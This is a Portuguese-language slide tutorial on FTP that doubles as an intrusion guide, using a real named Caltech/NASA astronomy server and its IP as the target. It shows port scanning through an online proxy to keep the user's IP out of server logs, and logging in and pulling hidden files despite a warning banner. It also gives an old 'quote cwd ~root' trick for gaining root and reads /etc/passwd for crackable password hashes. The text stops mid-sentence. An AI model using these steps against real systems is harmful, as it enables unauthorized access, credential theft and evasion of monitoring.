SlideShare uma empresa Scribd logo
1 de 38
Baixar para ler offline
CONTEUDO
O que é FTP
- Conceitos básicos
- Cliente/Servidor
- Porta padrão
- Como conectar
- Comandos
- TraDução de nome de arquivos
- Mensagens FTP
Servidor alvo
- Sobre o servidor que envia dados para NASA
Visualizando o servidor FTP com proxy
- Webexploiter
- Como pegar o IP do servidor
- Procurando portas abertas
- Visualizando FTP de uma forma segura
Visualizando os arquivos do FTP diretamente de seu computador
- Como pegar o IP
- Verificando se a porta 21 está aberta
- Logando no servidor
- Definindo um diretório local
- Listando diretórios
- Abrindo diretórios e listando arquivos
- Procurando arquivos ocultos
- Baixando arquivos do servidor
- Enviando arquivo para o servidor
- Visualizando o arquivo do Banner
- Analisando os arquivos
- Restrições
Enviando comandos diretamente para o servidor
- Entendendo os comandos
- Logando no Sistema
- Sistema operacional
- Conexão de Dados
- Comandos que utilizam conexão de dados
FTP via TELNET
- Conexão direta com o servidor
- Conexão de rede via FTP
- Como criar uma conexão de rede com o servidor
FTP UNIX
- Usuários
- Navegação
- Principais comandos UNIX
- Modificando os permissões
- Principais diretórios
- Senhas e Exploits
- Login anônimo
- Logar como root
- Diretório das senhas
- Decriptografando uma senha
- Quebrando uma senha
- Exploits UNIX
- BuG DE PHF
- Principais Falhas de FTP
PREFÁCIOPREFÁCIOPREFÁCIOPREFÁCIO
Atualmente invadir um servidor de FTP não é mais uma tarefa facio.
Os sistemas operacionais, protocolos evoluíram, muitos bugs foram
corrigidos. Mas ainda esta longe de ser perfeito, existem muitas falhas,
formas de invasão. O que não existe mais são as formulas prontas do tipo
“use este script que você esta dentro do servidor”
Para você conseguir entrar em um servidor FTP, antes de tudo você
precisa saber como ele funciona, quais as vulnerabilidades do servidor e
de seu sistema operacional, conhecer a fundo o protocolo FTP, seus
comandos, ou seja, é preciso realmente estudar.
O propósito desta apostila é este, estudar o funcionamento e
vulnerabilidades de um servidor FTP. Eu usei um servidor Americano que
envia dados para NASA como exemplo, deixei tudo passo a passo como
logar e navegar no servidor, porem quero deixar claro que não tem nada
de ilegal, o servidor tem suas proteções como veremos mais adiante. Não
estou promovendo nenhum tipo de crime virtual, usem isto para aumentar
seu conhecimento em segurança, lembrando que se você mudar um byte
de um servidor que você não tem autorização é crime.
Rackerox
rackerox@hotmail.com
O QUE É FTP
FTP significa File Transfer Protocol (Protocolo de Transferência de Arquivos), e é uma forma
bastante rápida e versátil de transferir arquivos, sendo uma das mais usadas na internet.
Um Website precisa de um servidor FTP para “guardar” seus arquivos. Quando você visita um site
na internet, você esta baixando os arquivos do site (paginas html, fotos, sons, etc) para o seu
computador.
Se você tiver acesso ao servidor FTP de um site, você terá acesso aos arquivos deste site, e mais
se você estiver logado o FTP você poderá mudar os arquivos
Primeiramente vamos entender alguns conceitos.
Para existir uma comunicação entre computadores é necessário:
-Um endereço de cada computador (IP)
-Um linguagem que os dois computadores entendam ( protocolos)
-Como são vários serviços ao mesmo tempo,exemplo chat ,site ,remote, etc...Cada serviço precisa ter uma
porta especifica, caso contrario os dados de um serviço iriam ser recebidos por outros.
Cliente / Servidor
Sem complicar...o conceito é simples:
Cliente é o seu programa de ftp que esta no seu computador.
Servidor é o que está hospedado junto com o site.
(você também pode criar um servidor em seu computador)
O Servidor remoto aceita uma conexão de controle do cliente local. O cliente envia comandos para o servidor
e a conexão persiste ao longo de toda a sessão (tratando-se assim de um protocolo que usa o TCP).O servidor
cria uma conexão de dados para a transferência de dados, sendo criada uma conexão para cada arquivo
transferido. Estes dados são transferidos do servidor para o cliente e vice e versa.
Os comandos estão separados dos dados e o cliente pode enviar comandos durante a transferência de dados. O
encerramento da conexão indica o fim do arquivo.
Porta padrão
A porta padrão para FTP é a porta 21
Como conectar
Existem vários Programas de cliente FTP, mas eles apenas servem para manutenção de sites. O melhor
programa mesmo são os clientes que não usam interface gráfica, eles funcionam com linha de comando,
funcionam no MS-DOS ou no Prompt de Comando no windows.
Vamos fazer um conexão com um servidor FTP usando o programa de FTP que existe no windows XP.Este
programa não tem interface gráfica, ele roda no Prompt de comando.
Para abrir o prompt de comando vá em executar e digite cmd.
Agora vamos abrir o programa de FTP no prompt de comando. Basta digitar ftp e apertar enter. Agora você
esta com o programa aberto, é preciso aprender os comandos.
Comandos FTP
Estes comandos funcionam com você logado no servidor.Você terá controle total sobre os arquivos
hospedados.
COMANDO SINTAXE DESCRIÇÃO
! ! COMANDO
Executa COMANDO na máquina local.
No prompt do ftp, os comandos digitados são, a princípio,
executados na máquina remota. Para executar um comando na
máquina local preceda o mesmo com o !
ascii ascii
Configura o tipo de transferência de arquivos para ASCII. É o valor
padrão
bell bell Emite um bip quando um comando é completado
binary binary Configura o tipo de transferência de arquivos para binário.
bye bye Encerra a sessão ftp e retorna ao interpretador de comandos
cd cd DIRETÓRIO Muda o diretório de trabalho para DIRETÓRIO
cdup cdup Muda para o diretório que está um nível acima do diretótio atual
chmod chmod MODO ARQUIVO Altera as permissões de ARQUIVO de acordo com MODO.
close close Encerra a sessão ftp e retorna ao interpretador de comandos
delete delete ARQUIVO Apaga ARQUIVO
dir dir DIRETÓRIO ARQUIVO-LOCAL
Lista o conteúdo de DIRETÓRIO colocando o resultado em
ARQUIVO-LOCAL, que é um arquivo na sua máquina. Se
DIRETÓRIO não for especificado, será listado o conteúdo do
diretório atual. Se ARQUIVO-LOCAL não for especificado a
listagem será enviada para a tela.
get
get ARQUIVO-REMOTO ARQUIVO-
LOCAL
Baixa ARQUIVO-REMOTO para sua máquina com o nome de
ARQUIVO-LOCAL. Se ARQUIVO-LOCAL não for especificado o
arquivo será baixado com o mesmo nome que tem na máquina remota.
help help COMANDO
Descreve sumariamente o COMANDO. Se este não for especificado
será exibida a lista de todos os comandos.
lcd lcd DIRETÓRIO Muda o diretório de trabalho na máquina local.
ls ls DIRETÓRIO ARQUIVO-LOCAL
Lista o conteúdo de DIRETÓRIO colocando o resultado em
ARQUIVO-LOCAL, que é um arquivo na sua máquina. Se
DIRETÓRIO não for especificado, será listado o conteúdo do
diretório atual. Se ARQUIVO-LOCAL não for especificado a
listagem será enviada para a tela.
mdelete mdelete ARQUIVOS Apaga ARQUIVOS
mdir
mdir DIRETÓRIOS ARQUIVO-
LOCAL
Semelhante a dir, porém lista o conteúdo de vários diretórios
mget mget ARQUIVOS Semelhante a get, porém baixa vários arquivos
mkdir mkdir DIRETÓRIO Cria um diretório com o nome de DIRETÓRIO
mls
mls DIRETÓRIOS ARQUIVO-
LOCAL
Semelhante a ls, porém lista o conteúdo de vários diretórios
mode mode MODO
Configura o modo de transferência de arquivos para MODO. O modo
padrão é "stream"
modtime modtime ARQUIVO Exibe a hora da última modificação de ARQUIVO
mput mput ARQUIVOS Semelhante a put, porém envia vários arquivos
newer
newer ARQUIVO-REMOTO
ARQUIVO-LOCAL
Substitui o ARQUIVO-LOCAL pelo ARQUIVO-REMOTO se a hora
de modificação do ARQUIVO-REMOTO for mais recente
nlist
nlist DIRETÓRIOS ARQUIVO-
LOCAL
Semelhante a nls
put
put ARQUIVO-LOCAL ARQUIVO-
REMOTO
Envia ARQUIVO-LOCAL para o servidor ftp nomeando-o como
ARQUIVO-REMOTO. Se ARQUIVO-REMOTO não for
especificado o arquivo será enviado com o nome de ARQUIVO-
LOCAL
pwd pwd Exibe o caminho completo(PATH) do diretório atual
quit quit Semelhante a bye
recv recv ARQUIVO-REMOTO Semelhante a get
ARQUIVO-LOCAL
reget
reget ARQUIVO-REMOTO
ARQUIVO-LOCAL
Semelhante a get com a diferença que se ARQUIVO-LOCAL existe
e é menor que ARQUIVO-REMOTO, reget considera que
ARQUIVO-LOCAL é ARQUIVO-REMOTO parcialmente
transferido e contiua a transferência do arquivo. Muito útil quando se
baixa arquivos grandes.
remotehelp
rhelp
remotehelp COMANDO
rhelp COMANDO
Semelhante a help, porém solicita ajuda ao servidor ftp
remotestatus
rstatus
remotestatus ARQUIVO
rstatus ARQUIVO
Exibe a situação de ARQUIVO. Se ARQUIVO não for especificado,
exibe a situação da máquina remota.
rename
rename NOME-ANTIGO NOME-
NOVO
Renomeia um arquivo
rmdir rmdir DIRETÓRIO Apaga DIRETÓRIO
send
send ARQUIVO-LOCAL ARQUIVO-
REMOTO
Semelhante a put
size size ARQUIVO Exibe o tamanho de ARQUIVO
status status Exibe a situação atual do servidor ftp
system system Exibe o tipo de sistema operacional da máquina remota
type type TIPO
Configura o tipo de transferência de arquivos para TIPO. O padrão é
ASCII. Se TIPO não for especificado, será mostrada a configuração
atual
? ? COMANDO Semelhante a help
Tradução de nomes de arquivos
A sintaxe dos nomes dos arquivos pode ser incompatível entre diferentes Sistemas Operacionais. O UNIX usa
128 caracteres, maiúsculas e minúsculas, enquanto que o DOS usa 8 + 3 caracteres e apenas maiúsculas.
Certos nomes não podem ser usados em alguns sistemas. Devido a isto tudo o BSD ftp define regras para a
tradução de nomes.
Mensagens FTP
O FTP permite dois modos de transferência de mensagens FTP: texto (com traduções apropriadas) ou binário
(sem tradução). Cada mensagem do servidor inclui um identificador decimal de 3 dígitos (exemplo: 226
Transfer complete). Estas mensagens podem ser vistas ou não, usando para isso o modo verbose ou quiet,
respectivamente.
SERVIDOR ALVO
Antes de tudo quero deixar claro que isto não é uma invasão ilegal, o servidor possui suas
proteções, mas adiante vocês vão perceber.
Vamos ver passo a passo como chegar até os arquivos de dentro do servidor.
Site alvo: http://ned.ipac.caltech.edu/
É uma base de dados do Governo Americano coordenada pelo Instituto de
tecnologia da Califórnia que fornece dados físicos e bibliográficos (coordenadas,
parâmetros astronômicos e posição num mapa estelar) para NASA.
É um laboratório de dados extragalácticos.
Visualizando o servidor FTP com Proxy
Agora vamos “exploitar” o site com um Exploiter on line: http://www.webexploiter.com
1º) Pegar o IP do site
Abra o webexploiter e vai em ping, vamos pingar o servidor.
Escolha a opção http delete o “www” e digite apenas:
ned.ipac.caltech.edu
como nesta imagem:
Clique em “ping it”
Pronto agora temos o IP do servidor:
Observe que a resposta do Ping vem com o IP:
134.4.10.118
2º) Procurando Portas abertas no Servidor:
Neste mesmo exploiter vamos fazer um scan de portas no IP que a gente pegou.
Basta ir em PORT SCAN, selecionar todas as portas e colar o IP:
Depois clique em SCAN
Observe que o servidor responde nas portas 80 e 21
A porta 21 por padrão é a porta de FTP
3º) Visualizando o FTP de uma forma Segura:
Agora sabendo que a porta 21 esta aberta, podemos conectar no FTP
Este mesmo exploiter possibilita que você veja arquivos em FTPs que permitem login anônimo:
Basta clicar em FTP > Visualize FTP (login anônimo)
Colar o IP
Clique em START
Observe:
Ai está os diretórios do FTP
Você pode navegar e baixar o que você quiser, têm estudos de galáxias, dados do telescópio hubble.
Como da para perceber é server UNIX. Os arquivos ai rodam no linux mas da para visualizar no windows sem
problema.
Arquivos “.gz” são arquivos compactados o Winzip e o Winrar descompacta no windows.
Arquivos “.dat” é só renomear para “.txt” que você verá os dados.
Apesar do FTP estar permitindo login anônimo a NASA não fez isto para todo mundo ficar mexendo, eles
deixaram um banner dizendo que se você não tem autorização pra entrar no FTP é para desconectar:
“If you are not authorized to access this system, disconnect now.”
Procure na pasta “msgs” que você vai localizar o banner.txt
Vantagem de visializar FTP primeiro no Webexploiter.
É mais prático e você protege seu IP do log do servidor.
Observe que neste servidor da nasa os IPs de quem loga fica registrado, se você deletar algum
arquivo, é crime.
Eu não sei se este é o LOG deles, mas pode ter certeza que o servidor tem um.
Quando você entra com o Webexploiter você conecta via Proxy.
O seu IP passa a ser: 67.15.221.2
Olhe da onde é este IP:
City: Houston
State: TX
Country: US
Postal code: 77060
Area code: 281
Lá no Texas, bem longe da sua casa.
Alem do FTP, o Ping e o Port Scan não partem de seu computador.
Da para você vasculhar o servidor no anonimato.
Mas ele é apenas um Scan, não é um site de invasão, depois de scanear se você quiser invadir pra valer ai é
outra historia.
Visualizando os arquivos do FTP diretamente de
seu computador
Eu não vou colocar senhas do site, existem muitos meios de quebrar uma senha de FTP, vou deixar apenas um
login de UNIX que funciona, mas tem permissão restrita.
A gente já tem todos os dados necessários, mas vou fazer tudo dinovo passo a passo pelo Prompt de
Comando.
1º) Pegar o IP com o Ping
ping ned.ipac.caltech.edu
2º) Verificar se a porta 21 (FTP) está aberta.
Vamos usar o Telnet (no Ruindows XP, o vista não tem)
Digite:
telnet
o 134.4.10.118 21
Você vai verificar que existe conexão e que agora as coisas ficam um pouco mais sérias, olhe a mensagem:
Digite quit duas vazes e saia do telnet
4º) Logando no FTP
Agora sabendo que a porta de FTP esta aberta, vamos entrar no programa de FTP do Ruindows.
Basta digitar FTP e dar enter
-agora vamos logar, digite:
o 134.4.10.118
Note que o servidor manda uma mensagem dizendo que o computador pertence ao Governo Americano, é
operado pelo instituto de tecnologia da califórnia e se você não tem autorização para estar ali é para
desconectar agora.
E depois pede o usuário
Aperte enter, vai dar falha de logon, mas tudo bem
Agora digite:
quote user ftp
Observe, ele aceita este usuário e pede o Password
Agora digite:
quote pass ftp
Olha que bunito xD, você esta dentro do servidor da NASA.
Definindo um diretório local
Primeiramente teremos que definir um diretório local (em nosso computador) para o programa de
FTP baixar e enviar os arquivos.
-Crie uma pasta no seu desktop (eu criei a pasta “rox”)
Agora vamos definir este diretório como diretório local.
Use o comando lcd
Agora digite
lcd Desktop
lcd rox
Pronto agora nossa pasta de trabalho é a pasta “rox”
Listando Diretorios
Primeiro vamos usar o comando dir
Apesar de ser um servidor UNIX o dir vai funcionar porque é um comando de seu programa de FTP
do windows.
Agora temos a lista dos diretórios do servidor.
bin dev etc msgs pub usr
Também podemos usar o comando ls
Abrindo diretórios e listando arquivos
Para abrir um diretório vamos usar o comando cd
Exemplo: vamos abrir o diretório “pub”
O comando será: cd pub
Observe que aparece a lista de todos os arquivos e diretórios que contem no diretório “pub”
Para voltarmos um diretório acima vamos usar o comando c ..
Não é c.. como no DOS, é c .. “C(espaço)..”
Digite c .. e depois ls
Observe que agora voltamos para o diretório anterior.
Procurando arquivos ocultos
O legal de usar comandos ao invés de programas prontos são as opções que você tem de
manipular um arquivo ou diretório, este é um exemplo.
Este servidor é UNIX, em UNIX qualquer arquivo que começa com um “.” (ponto)
É um arquivo oculto. Este arquivo é invisível a primeira vista. E se esta oculto deve ser por algum
motivo.
Vamos analisar o diretório “pub” novamente.
cd pub
ls
Agora digite o comando ls –la
Observe a diferença na lista de arquivos
Baixando arquivos do servidor
Já que estamos no diretório “pub” vamos baixar um arquivo deste diretório.
Primeiro vamos conferir nosso diretório local: comando lcd
Agora vamos usar o comando get para baixar o arquivo.
Importante: não aparecerá nenhuma caixa de download e nenhuma barra de tempo. Dependendo
do tamanho do arquivo, vai demorar para baixar.
Vamos baixar o arquivo lisa.txt
Basta digitar:
get lisa.txt
Espere um pouco e abra a pasta “rox” que você criou no desktop.
Vamos baixar um arquivo oculto, o .dat.gz
get .dat.gz
Você pode baixar todos os arquivos que você conseguir listar.
Se quando você ler esta apostila os arquivos “lisa.txt e “.dat.gz” não mais existirem tente baixar
outros.
Olhe os arquivos que nos baixamos do servidor na pasta “rox”
Enviando arquivo para o servidor
O comando para enviar um arquivo é o comando put
Vamos tentar enviar um arquivo para o diretório pub
Coloque qualquer arquivo no diretório local (no nosso caso a pasta “rox”)
Vou colocar um arquivo qualquer.. .
Lamer_list.doc
É um arquivo do Word
Agora vamos tentar enviar este arquivo para o servidor, basta digitar:
put Lamer_list.doc
Observe:
O servidor não aceitou, isto significa que o nível do seu usuário não permite “UPAR” nada para
aquele diretório. Tente em outro diretório, mas acredito que com logim anônimo você não vai
conseguir. Só com outro login.
Visualizando o arquivo do Banner
Lembra da mensagem do servidor?
Esta aqui:
Vamos traduzir:
*------------------------------------------------------------------------
* Este computador é financiado pelo Governo dos Estados Unidos
* E operado pelo California Institute of Technology
* De apoio ao curso U.S. Government programas e atividades.
* Ao continuar, você concorda com os dados que voce digitar
* Sendo monitorado. Os usuários deste sistema não têm nenhuma expectativa de
* Privacidade.
* Se você não está autorizado a acessar a este sistema, desconecte agora.
*------------------------------------------------------------------------
Vamos achar o arquivo desta mensagem.
É um arquivo de texto.
Volte para o inicio
cd ..
Agora liste
ls
Entre no diretório msgs
cd msgs
liste este diretório
ls
Observe na imagem o arquivo banner.txt
Agora vamos baixar este arquivo
get banner.txt
Agora observe nossa pasta “rox”
Abra o arquivo banner.txt
Surpresa:
Você deve estar pensando:
Então eu vou deletar este arquivo no servidor e colocar outro com minha mensagem no
lugar dele.
Isto é o famoso Banner Grabbing.
O comando para deletar é o del
E o comando para enviar arquivo é o put
Mas as coisas não são tão simples assim, você esta logado como anônimo e sua permissão neste
diretório é este.
drwxr-xr-x
você esta no terceiro grupo “xr-“
Ai não tem nenhum “w” significa que você só pode ler o arquivo e não pode gravar nada.
Com login anônimo sem chance, você terá que pegar alguma senha e logar.
Tem mais arquivos de banner ai, baixe eles e olhe.
Analisando os arquivos
Eu analisei os arquivos do servidor e não achei nada de interessante.
Só tem dados de satélite, telescópio estudos de física.
Se fosse na guerra fria até dava para vender para União Soviética rsrs.
Mas da para estudar e estrutura de diretórios e arquivos UNIX
Olhem as extensões que mais aparecem.
.dat dat é uma abreviação de data (dados), este arquivo contem dados, neste caso dados de
telescópio, satélite,sei la.
Eu renomei um deles para .txt , tinha isto:
File Name: .dat, Processing Time: Thu Feb 8 04:30:00
Output option: compact_2
************************** SEARCH REQUESTS ******************************
IN_CSYS : equatorial , IN_EQUINOX : J2000.0
OUT_CSYS: equatorial , OUT_EQUINOX: J2000.0
EXTENDED_NAME_SEARCH: Yes
SORTED_BY_FIELD : Distance_to_search_center
REDSHIFT_VELOCITY : 10000.0
DEFAULT_RADIUS : 1.000000
DEFAULT_BEGIN_YEAR : 1900
DEFAULT_END_YEAR : 2006
IAU NAME STYLE : S
NEARPOSN:
1.4514872000d ; 54.55719600 ; 1.00
Much care has gone into the collection of POSITIONS and VELOCITIES in
NED, and they are carried along with uncertainties and references to
their origin. These are continually over-written by more accurate
values as they become available.
The other "Basic Data", however -- diameters, magnitudes, flux densities,
cluster populations, etc -- are indicative values only, in the sense that
they originate in many different sources, and have not been placed on a
uniform scale. The main sources are catalogs and compilations, with the
more accurate data sets favored, and the larger ones favored at comparable
accuracy. No information is kept about the origin of "Basic Data".
More controlled and rigorous data collection is applied to PHOTOMETRIC
DATA, POSITION DATA, and REDSHIFT DATA. These measurements are carried
along with their uncertainties, references to their origin, and some
information about the data collection and processing behind them. Unlike
basic data, PHOTOMETRIC, POSITION, and REDSHIFT DATA are never erased or
updated, but should serve as a cumulative record of the measurements on
each object. As a future enhancement to NED, additional data frames
along the same lines will be introduced for kinematics, classifications,
and other parameters.
A. Galaxies (G)
Field 1: Morphology
Field 2: A magnitude in the visible range, on any scale as available
Field 3: Major axis diameter in arcmin
Field 4: Minor axis diameter in arcmin
.gz (arquivo compactado, o winzip do windows consegue descompactar)
.txt (arquivo de texto ...)
.c (são scripts, muito interessante)
Restrições
Quando logamos apareceu a mensagem:
(restrições aplicadas)
E quando digitamos dir apareceu isto.
d x w são códigos de permissão para cada diretório, mas adiante eu explicarei o que significa cada
código.
Isto significa que não temos acesso a tudo dentro do servidor, agora você percebeu que entrar
anônimo, não significa burlar uma senha, mas sim entrar como um usuário com um nível baixo e
cheio de restrições. Mas, uma vês lá dentro, você pode procurar por arquivos e dados que te levam
a senha do root ou à outros usuários.
ENVIANDO COMANDOS DIRETAMENTE PARA O
SERVIDOR
Até agora fizemos um monte de comando, testes e tudo mais. Você deve estar se perguntando:
Mas eu já enviei um monte de comandos?
Sim, você enviou, mas não diretamente, você usou o programa cliente de ftp.
Existe uma diferença em usar um programa de FTP e enviar comandos diretamente para o
servidor. O programa de FTP do windows ou do Linux apenas interpreta estes comandos
padronizados para FTP e envia para o servidor.Enviar um comando diretamente para o servidor é
diferente.
Vamos ver na pratica:
Digite help
Você vai visualizar o help do seu programa de FTP e todos os comandos que o seu programa de
FTP interpreta. No nosso caso nosso servidor é um UNIX e ele interpreta mais comandos do que
apenas estes de nosso programa de FTP.
O programa de FTP do windows tem uma espécie de “filtro” que envia uma linha de comando
diretamente para o servidor, este “filtro” é o comando quote ou o comando literal
Agora digite quote help
Observe que aparece um monte de comandos diferentes que o servidor interpreta, mas estes
comandos não são interpretados pelo seu programa de FTP.
IMAGEM
Existe Duas formas de enviar um comando diretamente para o servidor: usando o comando quote
ou conectando via telnet.
Vamos usar o programa de FTP mesmo
ENTENDENDO OS COMANDOS
O protocolo FTP se baseia em comandos e respostas.
Para enviar um comando basta enviar um texto pela conexão de controle (no nosso caso o nosso
computador) seguido por uma nova linha (“Line Feed” ASCII 10 - 0x0A)
Após o “Line Feed ASCII 10 - 0x0A” o servidor executará o comando e dará uma resposta.
Formato da resposta:
220<ASCII 32 - 0x20>Resposta do Servidor<ASCII 10 - 0x0A>
220 (código de retorno)
ASCII 32 - 0x20 (espaço em branco)
ASCII 10 - 0x0A (uma linha nova)
Se a resposta ocupar mais de uma linha o formato seguira o mesmo padrão.
220-<Espaço>Resposta (Linha 1)<LineFeed>
220-<Espaço>Resposta (Linha 2)<LineFeed>
Neste formato, todas as linhas, com exceção da última, possuem um hífen (ASCII 45 - 0x2D)
imediatamente após o código de retorno, exceto a última, que não possui hífen justamente para
sinalizar que é a última linha da resposta.
Então enquanto não aparecer o hífen deve-se aguardar o termino da resposta
LOGANDO no SISTEMA
Os comandos são simples user (para usuário) e (pass para senha)
Depois de conectado com o programa de ftp do windows ou do linux vamos enviar comandos
diretamente para o servidor utilizando o comando quote
quote user seuusuario
quote pass suasenha
Se você não souber nenhuma senha tente anônimo
quote user anonymous
quote pass rackerox@ned.ipac....
Você também pode tentar explorar uma falha antiga, mas só funciona com servidores
antigos.quando aparecer para logar digite isto:
quote user ftp
depois
quote cwd ~root ou quote cwd~sys quote cwd~sysop
depois
quote pass ftp
O comando cwd (Change Working Directory) é usado orinalmente para abrir um diretório, neste
caso ele iria abrir ~root ,se isto acontecer Voce estará com privilégios root, você pode fazer o que
quiser no servidor, terá permissão para tudo, inclusive para ser preso =)
SISTEMA OPERACIONAL
Agora que já estamos logados vamos descobrir qual o sistema operacional do servidor, vamos usar
o comando syst , como é um comando direto vamos usar quote syst
Agora sabemos que é UNIX
CONEXÃO DE DADOS
Existem comandos que precisam de uma conexão de dados estabelecida, por exemplo, se for
baixar algum arquivo do servidor é necessário estabelecer portas do computador para isto.
O programa de FTP faz tudo isto automaticamente, mas como estando enviando um comando
direto ao servidor teremos que estabelecer quais serão as portas que iremos usar.
Vamos usar o comando port
O “port” indica ao servidor quais portas serão usadas na conexão
Neste comando, deve-se passar 6 valores separados pro vírgula. Os 4 primeiros são os dígitos do IP.
Os outros dois valores representam a porta TCP em que será feita a conexão.para definir a porta é um pouquinho
complicado, você terá que separar os dois bytes que compõem o valor da porta e convertê-los para decimal.Exemplo:
Xxxxx
Exemplo do comando port
Você também pode deixar o servidor especificar qual porta será utilizada, eu acho bem melhor, ai
você não corre o risco de especificar uma porta que já esta sendo utilizada.Para isto use o
comando pasv
Os bytes retornados nos parênteses são: os quatros primeiros são o IP, os outros dois são a porta.
Para obter o número da porta, pegue o primeiro valor, multiplique por 256 e some ao segundo.
Neste caso (164,217) a porta seria 24201 (10x164 + 217 = 24201).
PRINCIPAIS COMANDOS que utilizam Conexão de Dados
quote list (lista os arquivos do diretório atual no servidor)
quote stor (Envia um arquivo para o servidor)
quote retr (Faz o download de um arquivo do servidor)
HELP
Cuidado para não se confundir com o help, este comando lista todos os comandos do servidor,
mas se você digita apenas help você terá os comandos do seu programa de FTP, para ver os
comandos do servidor digite quote help
Comando help (help do programa de FTP)
Comando quote help (help do servidor)
FTP via TELNETFTP via TELNETFTP via TELNETFTP via TELNET
Também podemos conectar um cliente Telnet na porta do FTP.
Primeiro vamos abrir nosso cliente Telnet, abra o prompt de comando novamente e digite telnet
(isto no windows XP, no vista você terá que baixar um cliente)
Depois que você apertar enter abrira o cliente de telnet do Windows.
Agora vamos abrir uma conexão com o servidor.
Vamos usar o comando open :
open ipdoservidor portadeconexao
Exemplo: vamos abrir uma conexão com o IP 134.4.10.118 na porta 21
Lembrando que a porta padrão para FTP é a porta 21.
O comando fica assim:
open 134.4.10.118 21
depois de conectado vamos logar no servidor, usando comando user
Se voce souber algum user e senha logue com ele, se não tente logar anônino
User anonymous
Se o servidor aceitar ele vai pedir para você completar com o passwd ou seu email, agora você usa
o comando pass
Mas no servidor não existe passwd para anonymous então você pode inventar um endereço de
email usando o domínio do servidor.
Resumindo:
user anonymous
pass rackerox@ipac.caltech.edu
Depois só voce apertar enter que você estará logado, observe a imagem.
Agora digite help
Vai aparecer uma lista de comandos. Esta lista de comandos não é do seu cliente de telnet, mas
sim do servidor que você esta acessando.
Observe que tem a assinatura do root: root@rad.ipac.caltech.edu
Via telnet você terá uma conexão direta com o servidor, isto significa que você não precisa mais do
quote, e também que aqueles comandos do programa de FTP não funcionará aqui.
Aqui só vão funcionar os comandos do servidor.
Para encerrar a conexão, basta digitar quit
Conexão de rede via FTPConexão de rede via FTPConexão de rede via FTPConexão de rede via FTP
Podemos visualizar e manipular arquivos de um servidor FTP dentro do windows como se o
arquivo estivesse no nosso computador.
Observe a imagem, aparece as pastas no explorer, você pode copiar, colar, recortar...
Para criar a conexão:
- Clique em Iniciar > Configurações > Painel de Controle > Conexões de Rede.
- Em outros locais (coluna à esquerda) entre em Meus Locais de Rede
- Depois clique em Adicionar local de Rede
- Agora é só ir seguindo as etapas.
- Coloque o IP ou o endereço do servidor de FTP
A vantagem de usar FTP desta forma é que fica bem mais simples e intuitivo.
Mas a grande Desvantagem é que você não terá as varias opções de comandos que existe no
prompt, você está limitado a copiar colar. Por exemplo, se tiver algum arquivo oculto, você nem
saberá.
FTP UNIX
A grande maioria dos servidores de FTP usam o Sistema Operacional UNIX.
Vamos ver como funciona e os principais comandos de UNIX em um servidor FTP
USUÁRIOS
Root = super usuário ( poder realizar todas as funções sem restrição )
Cada usuário é classificado com um número, de 0 a FFFF-1 (65534).
O numero 0 é designado para o Root e o 65534 para Ananymous
De 0 a 100 são de superusuários (bin, adm, user, admin, guest, etc), se o servidor for pequeno o
root e estes outros superusários são a mesma pessoa.
NAVEGAÇÃO
Importante em Unix os comandos são Case Sensitive ( diferencia letras maiúsculas e minúsculas
ao contrario do MS-DOS)
O Unix usa arvore de diretórios igual ao DOS mas a barra é invertida, ( utilize / ao invés de  )
ls (mostras os diretórios e arquivos, o ls equivale ao DIR /W)
ls –a (mostras arquivos ocultos)
ls –la (mostras arquivos ocultos com detalhes)
ls –l (mostra as permissões)
exemplo:
drw-r--r-- root root 10000 1 de abril etc
d - directory
r - read - so pode ver, dar download, etc...
w - write - pode editar, gravar...
x - execute - eh um executavel ou um script (tipo .BAT do DOS)
Primeiro espaço: mostra se é um diretório ou não.
Próximos 3 espaços: o que o proprietário pode fazer com o arquivo
Próximos 3 espaços: são do GROUP que pertence o arquivo
Últimos 3 espaços: são do USER (o que qualquer usuário pode fazer)
Os últimos números são bytes ocupados.
PRINCIPAIS COMANDOS
cd nomedodiretorio (para mudar de diretório)
cd .. (para voltar um diretório)
pwd (para ver em que diretório você esta)
mkdir nomedodiretorio (para criar um diretório)
rm arquivo (remover um arquivo, irá pedir confirmação y ou n )
cp arquivooriginal novalocalizaçao (copiar um arquivo)
cat (mostra o conteúdo de um arquivo equivale ao type do DOS)
who ( mostra quem está conectado no server, para mandar uma mensagem utilize write
nomedouser)
get nomedoarquivo (faz download do arquivo)
cc arquivo (compila um arquivo)
gcc arquivo monedoprograma ( compila um arquivo como o cc)
MODIFICANDO AS PERMISSÕES
chmod muda as permissões, exemplo:
ls -l teste.txt
-rw-r--r-- LoKi LoKi 34 teste.txt
chmod g+w teste.txt ---> muda o acesso do Group para +write
ls -l teste.txt
-rw-rw-r-- LoKi LoKi 34 teste.txt
chmod a-r teste.txt ---> muda o acesso de All para -read
ls -l teste.txt
--w--w---- LoKi LoKi 34 teste.txt
chmod u+w teste.txt ---> muda o acesso de User para +write
ls -l teste.txt
--w--w--w- LoKi LoKi 34 teste.txt
resumindo:
o - para Owner
g - para o Grupo
u - para todos Usuários
Importante: somente o root ou o proprietário pode usar o chmod.
Mais comandos
chown, muda o OWNER (proprietário) de algum arquivo, isso se você for o OWNER atual.
Use chown novodono nomedoarquivo
chgrp, muda o grupo a que pertence o arquivo.
Use chgrp novogrupo nomedoarquivo
PRICIPAIS DIRETORIOS
/etc/passwd
Neste diretório estão contidos:
Usuários, Senhas , Ids
Abra o arquivo passwd, dependendo da sua permissão aparecera:
root:*:0:1:system PRIVILEGED account:/:/bin/sh
anonymous:*Nologin:65534:65534:anonymous NFS user:/:
ou
zezinhodaesquina:HS$672H:457:457:Senhor Joao:/usr/joazinho:/bin/sh
(username:Password:id:uid:mini descrição:diretório de trabalho:'command.com')
Se você conseguir abrir o arquivo passwd você verá que o anonymous não tem senha (por isso
você pode logar anônimo com qualquer password)
Se você perceber algum outro user UNPASSWORDED (sem senha) e com o ID melhor que o seu,
entre logado com ele.
Mas se a senha esta ai, porque não entrar com ela agora?
Respostas, as senhas estão criptografadas, mas adiante veremos como decriptografar.
Talves quando você abra o arquivo passwd pode aparecer isto:
root:*:0:1:system PRIVILEGED account:/:/bin/sh
anonymous:*Nologin:65534:65534:anonymous NFS user:/:
nobodyV:*Nologin:60001:60001:anonymous SystemV.4 NFS user:/:
daemon:*:1:1:system background account:/:
bin:*:3:4:system librarian account:/bin:
uucp:Nologin:4:2:UNIX-to-UNIX Copy:/usr/spool/uucppublic:/usr/lib/uucp/uucico
ris:Nologin:11:21:Remote Installation Services Account:/usr/adm/ris:/bin/sh
ftp::12:15:Anonymous FTP:/tmp:/bin/sh
Observe que no lugar das senhas dos usuários aparece um asterisco “*” , isto significa que as
senhas estão em um outro lugar. Normalmente em
